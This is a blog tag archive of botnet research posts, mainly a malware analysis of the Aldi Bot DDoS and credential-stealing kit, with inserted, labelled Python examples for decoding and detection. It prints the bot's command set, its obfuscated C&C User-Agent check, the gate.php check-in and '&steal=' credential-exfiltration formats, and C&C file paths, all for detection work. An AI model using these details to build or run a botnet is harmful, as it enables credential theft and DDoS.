Tag Archives: Botnet (May 2012)

Dirt Jumper DDoS Bot Increasingly Popular

By: Jose -

We’ve profiled the Dirt Jumper DDoS bot before and shown its evolution over the years. We then took this analysis into our zoo to see which DDoS bot families are growing in popularity with attackers. The marketplace has opened up significantly (see Curt’s excellent overview of DDoS tools and services) in recent years, and with that comes competition.

In the past few years, the popular kit we saw in our zoo was Black Energy, an easy to use, powerful DDoS bot distributed in Russian-language spheres. You could find it on the net for anywhere from $40 to free, depending on how hard you looked. Starting in 2009, Black Energy version 2 was available. It boasted a modular architecture and included banking theft Trojan functionality to augment the DDoS functionality. Another competitor that appeared in this timeframe was Optima or Darkness. It then becomes interesting to look in one’s zoo to see which families are popular at present.

The graphic below is from some quick analysis of our zoo, looking at our automated classification system that tags samples with the appropriate family name. Optima includes the group of Darkness, Optima and Votwup samples we have seen; Black Energy focuses on the BEv1 samples we have seen in the wild, and omits any BEv2 samples we have; Dirt Jumper includes all Russkill variants and Dirt Jumper variants we have seen. What we saw was a bit surprising, namely the rate at which Dirt Jumper samples appear in our zoo and quickly overtake the other families in terms of popularity. This matches anecdotally what we had seen, but the magnitude itself is surprising.

Some ideas as to what is going on:

  • With BEv2, the Black Energy author (back in 2009, when it was being developed and tested) appears to have tried to piggyback on the Zeus and SpyEye craze that was really gathering momentum at the time. Modules to steal from banks would have been a great complement, in theory, but in reality BE targeted DDoS actors who hang out in different forums than the financial thieves. With the notable exception of the Gameover series of attacks, these two groups don’t spend a lot of time together from my own observations.
  • Optima and Darkness make a decent product. I didn’t keep track of pricing or advertising, but their usability, reliability and features all come together to make a great follow-on to the Black Energy model (kit which includes an easy to use web UI and a builder to configure the feature-rich DDoS bot). Why it didn’t take off is really something I can’t explain.
  • Finally, Dirt Jumper’s meteoric rise in popularity in this time frame suggests that the author (and any promoters they have working for them) is doing something right. Features are getting incorporated well, new versions are released, and the bot’s got traction in the community. An alternative explanation is that the leaks we see leading to “unofficial versions” are also classified as DJ and explain the rise.

In this competitive underground world, it’s fascinating to see market forces at work so clearly. Bear in mind that all this popularity leads to attention, both in terms of CnC tracking (and shutdown) and AV detection, which is counter-productive. We’ll see how these guys react to larger responses.

DDoS Attacks in Russia Added to Protests

By: Jose -

2011, and now 2012, appear to be years of major populist protests regarding political processes around the world. Russia is no different. News reports of protests in the streets of Moscow have been increasing, with protesters demanding election reforms and fairness. It is in this backdrop that we’re seeing DDoS attacks against some websites.

A recent BBC News story on Russian protests about upcoming elections caused me to go looking in our database for domestic DDoS attacks within Russia on sympathetic sites calling for election changes. We’ve seen this sort of thing in the past, specifically in the 2009 run-up to the elections where opponents to Putin and Medvedev were attacked, so it seems natural to expect it this time.

Inspection of our botnet tracking logs from Project Bladerunner shows multiple sites under attack recently that appear to be politically motivated. Four are news sites (three belong to journalufa). The other is a candidate’s site, and all attacks are ongoing. The botnets here are Dirt Jumper and Black Energy. Despite press that the radio station Echo Moscow is getting political pressure for its pro-change reporting, we haven’t yet seen their properties struck by attacks as we have in the past.

First seen            Last seen             Target Host
2012-02-14 22:57:53   2012-02-15 10:58:01   www.muhamediarov.ru
2012-02-14 06:58:24   2012-02-14 06:58:25   journalufa.livejournal.com
2012-02-14 06:58:22   2012-02-14 06:58:24   journalufa.wordpress.com
2012-02-10 06:58:50   2012-02-15 10:57:59   cik-ufa.ru
2011-09-29 12:28:32   2012-02-15 10:58:01   journalufa.com

As you can see from the following screenshots taken today, two of the sites are accessible, but one of them notes that it’s under attack.

CIK-UFA under attack

Journal UFA under attack

The botnets behind these attacks have been actively involved in many DDoS attacks in recent weeks, some of which are on commercial properties, and some of which are on news sites. These appear to be their most overtly political targets. In short, these do not appear to be purpose built for political attacks.

We’re keeping an eye on this situation, expecting it to continue or get worse as the elections approach on March 4.

DDoS Watch: Keeping an Eye on Aldi Bot

By: cwilson -

Background

The intention of this entry is to profile some elements of the Aldi Bot in order to provide value for the security operations community and malware research community.

Aldi Bot is a newer inexpensive DDoS bot that is growing in popularity. Recent data (September 30 2011) suggests that there are at least 50 distinct Aldi bot binaries that have been seen in the wild with 44 unique Command & Control points. We see the bot active in Russia, the Ukraine, the US, and Germany. While it has been stated that Aldi Bot won’t be developed further, the source code has leaked which makes it easy to find and use.

G-Data and others in the security community have discussed this bot in recent weeks. Of special interest to those concerned with availability, Aldi Bot offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy and the ability to download and execute malicious code of the attacker’s choice.

To underscore its attack capabilities, Aldi Bot was used to DDoS bka.de, the German federal police website in a demonstration video.

Figure 1 – Aldi Bot demonstration video launching DDoS attack on bka.de

All it takes is one bot such as Aldi Bot or other tool such as a Remote Access Trojan (RAT) to provide an attacker a handhold on the inside of an organization that can lead to a much larger security breach. It is now well-known that attacks involving the exfiltration of sensitive data typically start with one smaller compromise that is then leveraged for additional access. Additionally Aldi Bot steals passwords, and passwords are often re-used for convenience even though it is a dangerous practice. Without proper monitoring of system and network activity, such infected nodes can be long-lived and pose significant risk.

Thankfully in this case it seems that the Aldi Bot back-ends aren’t long lasting. Of the list of 41 back-ends that I obtained on September 30, 2011, it appears that only 13 of them were still online as of October 3, 2011.

Detection & uniqueness of threat

The author of Aldi Bot suggests that the bot will not be FUD (fully undetectable) and indeed Aldi Bot’s initial antivirus detection based on a September 22, 2011 analysis of the sample I analyzed (MD5: c903b63346c90d29b0fe711a68a747ba) features a 72.7% detection rate, with four vendors using a term similar to “Aldi Bot” such as “Abot” or “Albot”. The rest of the detections are generic.

http://www.virustotal.com/file-scan/report.html?id=dd29102bd9dc8e6599c38ea6dab9164bc5f072f2de0dc5706f120199c14b8949-1316731656

As antivirus detection can be an indicator that triggers an organization’s Incident Response function, responders will have to dig a little deeper in many cases because generic alerts don’t provide much context as to the true nature of the threat. An example of this is a user seeking assistance with an Aldi Bot infection using the default filename “jetzt_kommt_aldi.exe” on September 4, 2011 on a Microsoft forum:

http://answers.microsoft.com/en-us/protect/forum/protect_scanning/jetztkommtaldiexe/27675ad5-45ba-4958-a6db-87b96a57164e?msgId=37b909f4-35f7-4d72-a0e3-a6704207c66b

While it has been speculated that Aldi Bot has borrowed from the Zeus banking Trojan source code release in early 2011, Aldi bot is written in Delphi with a PHP back-end, while Zeus is written in C++ with PHP on the back-end. The only obvious similarity between Zeus and Aldi Bot that I can see at first glance is that both of them tend to use a filename called gate.php on the web-based back-end as a “drop zone” to process stolen data.

Commands

Aldi bot’s commands are as follows:

  • ‘StartHTTP’ – starts an HTTP DDoS attack
  • ‘StartTCP’ – starts a TCP DDoS attack
  • ‘StopHTTPDDoS’ – stops an HTTP DDoS attack
  • ‘StopTCPDDoS’ – stops a TCP DDoS attack
  • ‘StopDDoS’ – apparently stops all DDoS attacks
  • ‘DownloadEx’ – download and execute other code (malware)
  • ‘CreateSocks’ – creates a SOCKS5 proxy
  • ‘StealData’ – trigger password stealing functionality
  • ‘Update’ – updates the bot

Custom User-Agent gets the goods

A potentially useful tidbit of information was found while reverse engineering the bot stub. While looking at an InternetOpenA API call associated with outbound activity, I noticed that a custom User-Agent “Aldi Bot FTW! :D” is used. It should be trivial to monitor for the presence of this string on the network.

push 10h ; dwFlags
push offset szProxyBypass ; lpszProxyBypass
push offset szProxyBypass ; lpszProxy
push 0 ; dwAccessType
push offset aAldiBotFtwD ; "Aldi Bot FTW! :D"
call InternetOpenA

If the wrong User-Agent is sent, then the back-end will not respond. On the wire, a request to gate.php from an infected host looks similar to this (values are obscured for security):

Figure 2 – infected host reaching out to back-end at initial infection time

Once the source code for Aldi Bot was obtained, it was easy to find this function:

Figure 3 – Delphi source code indicates custom User-Agent

The back-end code that performs this checking was found with a datestamp from August 27, 2011 (the initial announcement for Aldi Bot itself was apparently made one day later on an underground forum on August 28, 2011). The PHP code that performs the User-Agent checking is as follows:

// Helper: strip spaces and 'x' characters, then unpack the remaining hex string into bytes.
function dnSOIAN0EWrU($XbJ41W11sYuW){
    $XbJ41W11sYuW=str_replace(' ','',$XbJ41W11sYuW);
    $XbJ41W11sYuW=str_replace('x','',$XbJ41W11sYuW);
    $XbJ41W11sYPW=pack('H*',$XbJ41W11sYuW);
    return $XbJ41W11sYPW;
}
// Drop the request unless the User-Agent matches the obfuscated constant:
// substr(-48) -> strrev -> unpack hex -> strrev -> base64_decode
$_SERVER['HTTP_USER_AGENT']!=base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157625c62585943514632514d3d3',-48))))) ? exit(): '';

While decoding what’s going on here would be an interesting exercise, it’s easier just to see what’s happening with a slight modification to echo the expected User-Agent string:

$ua = base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157625c62585943514632514d3d3',-48)))));
echo "Expected User-Agent: [", $ua, "]";

Running the PHP code then displays the expected string:

$ php -f aldi.php
Expected User-Agent: [Aldi Bot FTW! :D]
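The same decoding carried out in Python, as an added example that is not code from the post or from the Aldi Bot kit: it reproduces each step of the PHP expression above and then reuses the recovered string as the comparison the back-end performs. The only input is the hex constant from the gate.php check; the function names are mine.

```python
import base64
import binascii

# Hex constant copied from the leaked gate.php check shown above (53 characters;
# only the last 48 are used, the leading "94320" is discarded by substr(..., -48)).
OBFUSCATED = "94320157587b6163524342633157625c62585943514632514d3d3"


def php_strrev_str(s: str) -> str:
    """PHP strrev() on a text string."""
    return s[::-1]


def unpack_hex(s: str) -> bytes:
    """Mirror of the kit's helper dnSOIAN0EWrU(): strip spaces and 'x', then pack('H*', ...)."""
    cleaned = s.replace(" ", "").replace("x", "")
    return binascii.unhexlify(cleaned)


def expected_user_agent(blob: str = OBFUSCATED) -> str:
    """Recover the User-Agent string the back-end compares requests against.

    The PHP expression reads inside-out as:
        substr(blob, -48) -> strrev -> unpack -> strrev -> base64_decode
    """
    last48 = blob[-48:]                       # substr($blob, -48)
    reversed_hex = php_strrev_str(last48)     # strrev(...) on the hex text
    raw = unpack_hex(reversed_hex)            # dnSOIAN0EWrU(...) -> packed bytes
    b64 = raw[::-1]                           # strrev() on the packed bytes
    return base64.b64decode(b64).decode("ascii")


def gate_accepts(request_user_agent: str) -> bool:
    """True when the check would let the request through instead of calling exit()."""
    return request_user_agent == expected_user_agent()


if __name__ == "__main__":
    print("Expected User-Agent: [%s]" % expected_user_agent())
```

Pulling the constant out this way is the general approach for any of these string-hiding chains: reproduce the transforms in order on the literal, and the indicator falls out without having to run the back-end code itself.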

Analyzing back-end functions and detecting Aldi Bot on the wire

Outbound traffic to the back-end “drop zone” will use an HTTP GET string that looks similar to this:

/gate.php?hwid=&pc=&localip=&winver=

The value for the hwid parameter is uniquely calculated based on the system’s hardware. The pc parameter is the PC’s name. The localip parameter is the local IP address of the system, and winver is the version of Windows installed, with x32 or x64 appended to match a 32- or 64-bit architecture.

When stolen data (only passwords at this time) is exfiltrated, a ‘&steal=’ parameter will be used in the URL that will also include the hwid value, as follows:

/gate.php?hwid=&steal=

The value passed in the steal parameter will be the type of credential and then the actual password values stolen from the system in the format of URL|User|Pass. Here is the back-end code responsible for storing the stolen credentials:

Figure 4 – PHP code handling stolen credentials

Click here to view full size image

A quick Google query as of 10/3/2011 with elements from the gate.php string reveals two obvious infections (both reported for takedown), one Windows 7 and one Windows XP:

http://<REMOVED>/b0ts4ev3ryb0dy/gate.php/gate.php?hwid=287389320&pc=%EE%E9%EB%EC-PC&localip=192.168.123.100&winver=Windows%207%20Professional%20x32

http://<REMOVED>.ru/gate.php/gate.php?hwid=2001606274&pc=HOME-OFF-D5F0AC&localip=192.168.102.23&winver=Windows%20XP%20Professional%20x32

The corresponding PHP back-end code (safe_xss is the kit’s own sanitising helper, not shown here):

//GET
$hwid = safe_xss($_GET['hwid']);
$localip = safe_xss($_GET['localip']);
$pc = safe_xss($_GET['pc']);
$winver = safe_xss($_GET['winver']);
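As an added example (not from the post or the kit), the following Python scans proxy-style log lines for the three indicators described above: the custom User-Agent, the gate.php check-in carrying all four registration parameters, and the &steal= exfiltration. The log format, client addresses and host names are constructed for the example; the steal value is assumed to be the credential type followed by URL|User|Pass with the same ‘|’ separator, which is my reading of the description above. Passwords are redacted in the output so the detection record does not become a second copy of the stolen data.

```python
import re
from urllib.parse import parse_qs, urlsplit

ALDI_USER_AGENT = "Aldi Bot FTW! :D"
BEACON_FIELDS = {"hwid", "pc", "localip", "winver"}   # check-in registration fields

# Constructed proxy-style log lines: client, method, URL, status, quoted User-Agent.
# Host names and client addresses are invented; the gate.php layouts follow the post.
SAMPLE_LOG = """\
10.0.0.12 GET http://cnc.example.invalid/gate.php?hwid=287389320&pc=HOME-OFF-D5F0AC&localip=192.168.102.23&winver=Windows%20XP%20Professional%20x32 200 "Aldi Bot FTW! :D"
10.0.0.12 GET http://cnc.example.invalid/gate.php?hwid=287389320&steal=Firefox%7Chttp://mail.example.invalid%7Calice%7Chunter2 200 "Aldi Bot FTW! :D"
10.0.0.33 GET http://www.example.invalid/index.php?id=stats 200 "Mozilla/5.0"
10.0.0.45 GET http://other.example.invalid/gate.php?hwid=1&pc=X&localip=10.0.0.45&winver=Windows%207%20x64 404 "Mozilla/4.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def summarise_steal(value: str) -> dict:
    """Split an assumed 'Type|URL|User|Pass' steal value; never keep the password."""
    parts = value.split("|")
    if len(parts) < 4:
        return {"raw_fields": len(parts)}
    return {"app": parts[0], "url": parts[1], "user": parts[2], "password": "<redacted>"}


def analyse(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["url"])
    params = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    is_gate = url.path.endswith("/gate.php")

    reasons = []
    if rec["ua"] == ALDI_USER_AGENT:
        reasons.append("user-agent")            # strong: fixed string from InternetOpenA
    if is_gate and BEACON_FIELDS.issubset(params):
        reasons.append("gate-beacon")           # check-in with hwid/pc/localip/winver
    if is_gate and "hwid" in params and "steal" in params:
        reasons.append("credential-exfil")      # drop-zone upload of stolen credentials
    if not reasons:
        return None

    finding = {"client": rec["client"], "host": url.hostname,
               "reasons": reasons, "hwid": params.get("hwid")}
    if "gate-beacon" in reasons:
        finding["pc"] = params["pc"]
        finding["winver"] = params["winver"]
    if "credential-exfil" in reasons:
        finding["stolen"] = summarise_steal(params["steal"])
    return finding


def scan(log_text: str) -> list:
    """Run analyse() over every line and keep the findings."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The User-Agent match is the high-confidence signal; the gate.php parameter shape on its own (the fourth sample line) is weaker and worth treating as a lead to confirm against the host, since the kit’s back-end paths are generic enough that other software could collide with them.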

This screenshot of bot statistics from one C&C shows that there were 239 bots online at one point; however, only 8 bots were active, making this particular instance of the Aldi botnet very small. This could be due to reasonably good antivirus detection of the bot. The pie chart looks incorrect; however, the stats indicate that the Netherlands experienced the highest infection rate at 57.7%, followed by the US with 10.5%.

Figure 5 – bot stats found on one C&C

Click here to view full size image

While the Aldi Bot source code has since been obtained, at first we only had a binary copy. In that case, the Interactive Delphi Reconstructor (IDR) does a pretty nice analysis job. IDR worked better than IDA or DeDe when working with Aldi Bot.

Figure 6 – IDR analysis of back-end traffic generation

Click here to view full size image

The default names of other Aldi bot back-end webapp components of interest (useful for network monitoring or probing on a C&C) include:
admin/inc
admin/inc/config.php
admin/inc/sess.php
admin/functions.php
admin/login.php
admin/pie.php
admin/index.php
admin/downlogs/
admin/img/aldi.gif
admin/js
admin/uploads/
geoip.php
index.php?id=stats
index.php?id=bots
index.php?id=bots&p=0
index.php?id=tasks
index.php?id=logs
index.php?id=upload
index.php?id=showlogs
index.php?logout

In addition to getting some value from watching for these patterns on the network, a review of back-ends indicates that sometimes certain folders such as admin/inc have directory indexing enabled which makes for an obvious C&C fingerprint.

Other indicators may include the following strings that have been seen in at least one Aldi Bot server-side install:

  • “Aldi Bot – installed by till7”
  • “StealData!” (from a misconfigured server)

The back-end login page looks like this:

Download and Execute in practice

As an example of the possible use for the “DownloadEx” function, a bit of poking at an active Aldi Bot campaign reveals the following:

1) Installation of yet another DDoS bot called Infinity Bot that has HTTP, ICMP, and TCP flooding capabilities.

2) Execution of the dScriptSt4r Anti-Virus Deleter, a simple batch file that tries to disable as many anti-virus applications as possible.

3) Secure-Soft Stealer 5.20, which is designed to steal credentials from the following applications: Trillian, Pidgin, Vitalwerks dynamic update client, DynDNS updater client, Steam, Opera, Firefox, Safari, jDownloader, Outlook, eMule, BulletProof FTP, Flash FXP, Miranda, Windows key, FileZilla, SmartFTP, MSN, ICQ, CoreFTP, and perhaps others.

Aldi Bot is just another in a long line of DDoS tools, however its inexpensive nature seems to have made it quickly popular. Underground forum posts praise its ability to perform effective DDoS attacks, which may have also contributed to the increase in popularity.

Figure 8 – Aldi Bot graphic from the back-end kit

References:

  • G Data: Botnets on discount – http://blog.gdatasoftware.com/blog/article/botnets-on-discount.html
  • H-Online: Malware for everyone – Aldi Bot at a discount price – http://www.h-online.com/security/news/item/Malware-for-everyone-Aldi-Bot-at-a-discount-price-1346594.html
  • Aldi Bot – bka.de DDoS video – http://www.youtube.com/watch?v=UskKFTFVLyI

Thanks to Arbor’s ASERT Team, Damballa and other anonymous contributors for additional data used in this analysis.

Highlights of Arbor Networks’ Fourth Annual Worldwide Infrastructure Security Report

By: Arbor Networks -

Highlights of Arbor Networks’ Fourth Annual Worldwide Infrastructure Security Report

Presenters:

  • Tom Bienkowski, Director of Product Marketing, Arbor Networks
  • Danny McPherson, Vice President and Chief Security Officer, Arbor Networks

Description:

For the past four years Arbor Networks has conducted a survey of many of the world’s network operators. This survey covers topics such as: Most significant network based threats; common attack vectors and targets; methods of attack detection and mitigation; and other related questions regarding size of staff, use of law enforcement, managed security services, etc. The results of the survey are compiled into the Worldwide Infrastructure Security Report.

This 45 minute video will focus on the more interesting highlights of this year’s report which was a culmination of responses from approximately 60 different network operators from around the world and their experiences in 2008.

Run time: 49:41 (Registration is required to view this Webcast – Click here to be taken to the registration page)

New attack patterns emerge in 2009

By: Arbor Networks -

Botnets were just the beginning. The bad guys will continue to use these to try and steal your data, but more sophisticated attacks over the application layer and targeted network attacks are on the way. In this Network World Podcast, Danny McPherson from Arbor Networks discusses the new ways that hackers will be trying to get into (and steal information from) your network in 2009.

Distributed SSH Brute Force Attacks

By: Jose -

Recently a couple of news reports have come in that suggest that someone has changed how they do SSH brute force attacks:

The change is this: instead of the hosts from the SSH botnet pounding away as fast as possible from the same IP over and over and over again, where you see it failing and failing and failing, these guys have moved to what they should have been doing, coordination. They’re only trying one or two logins from a single IP before moving on; another IP from the botnet tries a new login. The IP may re-appear but only after a while. This defeats some of the simple rate-based triggers for local protection. What’s more is they’re only trying very specific SSH servers. They seem to not be trying everything in the book.

The answer to this is to use a blacklist, working on the theory that someone else has seen this IP scanning and trying logins and failing. Here’s a list of blacklists you can use (import them with caution, use at your own risk, etc).

These lists MAY help you prevent the attempts from the botnet (and many others). I’ve worked with the person (let’s call him C) who both gathered this list and did more analysis of this distributed, patient scanning, to look at the overlap between Arbor’s SSH scanner and bruter blacklist and his own blacklist, and we came up with about 12% overlap. Not great, and I wonder how much overlap there will be in the future (i.e., if we go forward one day, would the Arbor SSH blacklist have prevented a bruter from trying logins?). I would suggest contributing to those blacklists to help everyone; there are a lot of SSH bots out there at this point!
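An added example (not from the post) of what the distributed pattern described above looks like in sshd logs and why a per-IP counter misses it: the Python below parses constructed auth.log lines, slides a five-minute window across the failed logins, and flags a window in which many distinct sources each fail only once or twice. It also checks the observed sources against a small constructed blacklist, the kind of cross-check the overlap figure above refers to. The window length, per-IP maximum and minimum source count are assumptions to tune locally, and the log year is assumed because syslog timestamps omit it.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sshd lines (syslog format). Addresses are documentation ranges, not real attackers.
SAMPLE_AUTH_LOG = """\
Feb 14 06:58:01 bastion sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Feb 14 06:58:07 bastion sshd[1203]: Failed password for root from 203.0.113.5 port 51240 ssh2
Feb 14 06:58:31 bastion sshd[1209]: Failed password for root from 198.51.100.17 port 40022 ssh2
Feb 14 06:59:02 bastion sshd[1214]: Failed password for invalid user oracle from 198.51.100.23 port 40100 ssh2
Feb 14 06:59:40 bastion sshd[1220]: Failed password for root from 192.0.2.77 port 33012 ssh2
Feb 14 07:00:11 bastion sshd[1226]: Failed password for invalid user test from 192.0.2.78 port 33019 ssh2
Feb 14 07:00:44 bastion sshd[1231]: Failed password for root from 203.0.113.9 port 51300 ssh2
Feb 14 07:01:05 bastion sshd[1235]: Accepted publickey for deploy from 10.0.0.4 port 52000 ssh2
Feb 14 07:01:30 bastion sshd[1240]: Failed password for root from 198.51.100.40 port 40500 ssh2
"""

# Constructed blacklist standing in for a shared SSH-attacker feed.
SAMPLE_BLACKLIST = {"198.51.100.17", "192.0.2.77", "203.0.113.200"}

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(text: str, year: int = 2012) -> list:
    """Return sorted (timestamp, username, source_ip) tuples for each failed login."""
    out = []
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue
        stamp = "%d %s" % (year, " ".join(m["ts"].split()))   # assumed year, squeezed spaces
        out.append((datetime.strptime(stamp, "%Y %b %d %H:%M:%S"), m["user"], m["ip"]))
    return sorted(out)


def per_ip_rate_rule(failures: list, threshold: int = 5) -> set:
    """The simple rule the post says is being evaded: act on an IP after N failures."""
    counts = Counter(ip for _, _, ip in failures)
    return {ip for ip, n in counts.items() if n >= threshold}


def detect_distributed(failures, window=300, per_ip_max=2, min_sources=5):
    """Slide a window over failures; report the window with the most distinct low-rate sources."""
    best = None
    start = 0
    span_len = timedelta(seconds=window)
    for end, (t, _, _) in enumerate(failures):
        while failures[start][0] < t - span_len:       # drop events older than the window
            start += 1
        span = failures[start:end + 1]
        per_ip = Counter(ip for _, _, ip in span)
        if len(per_ip) >= min_sources and max(per_ip.values()) <= per_ip_max:
            if best is None or len(per_ip) > best["sources"]:
                best = {"window_end": t, "sources": len(per_ip), "attempts": len(span),
                        "max_per_ip": max(per_ip.values()),
                        "usernames": sorted({u for _, u, _ in span})}
    return best


def sources_on_blacklist(failures, blacklist) -> list:
    """Which observed sources a shared blacklist would already have caught."""
    return sorted({ip for _, _, ip in failures} & set(blacklist))


if __name__ == "__main__":
    fails = parse_failures(SAMPLE_AUTH_LOG)
    print("per-IP rule would act on:", per_ip_rate_rule(fails) or "nothing")
    print("distributed window:", detect_distributed(fails))
    print("already blacklisted:", sources_on_blacklist(fails, SAMPLE_BLACKLIST))
```

On the sample, no source ever reaches the per-IP threshold, so a rate rule stays quiet, while the windowed view shows seven sources sharing one password-guessing job and only two of them already on the feed; that gap is what makes contributing observed sources back to a shared list worthwhile.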

Also, here’s a 2d snapshot of ATLAS’ SSH blacklist: http://atlas-public.ec2.arbor.net/public/ssh_attackers

What we’re lacking so far is a capture of the tools on the box, the bot code. I analyzed a case earlier this week where an SSH server was broken into via SSH scanning and it was just a typical IROFFER network. This looks far more substantial than that.

If you have tracks matching this AND you want to help analyze this, please be in contact.

Many thanks to C for his great analysis of the events so far. He, too, is looking for “what comes next”.
